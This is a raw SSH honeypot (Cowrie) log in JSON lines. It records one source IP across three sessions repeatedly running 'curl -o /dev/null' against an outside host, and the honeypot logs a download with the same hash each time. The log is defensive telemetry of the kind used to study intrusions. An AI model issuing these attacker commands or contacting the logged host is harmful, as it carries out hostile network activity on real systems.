{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.825853Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.827441Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.828387Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.860758Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.862772Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.865519Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.866711Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.867555Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.870165Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.870694Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.872799Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.873174Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.906050Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.908183Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.910738Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.912793Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.913602Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.918299Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.919229Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.919873Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.944182Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.944994Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.950036Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.953471Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.954705Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.955844Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.958297Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.959382Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.985859Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.987037Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.987623Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.991166Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.994611Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:16.997069Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:16.998176Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.000354Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.001748Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.033174Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.034289Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.034729Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.038516Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.040306Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.040900Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.042380Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.043055Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.074807Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.076662Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.080293Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.081611Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.084920Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.102327Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.115179Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.115990Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.118555Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.119206Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.122941Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.158241Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.160094Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.162181Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.164462Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.164862Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.166084Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.166450Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.198193Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.198869Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.203273Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.204457Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.206242Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.207064Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.209510Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.211174Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.213466Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.215629Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.240951Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.241948Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.242488Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:17.244739Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.245275Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.250287Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:17.253150Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
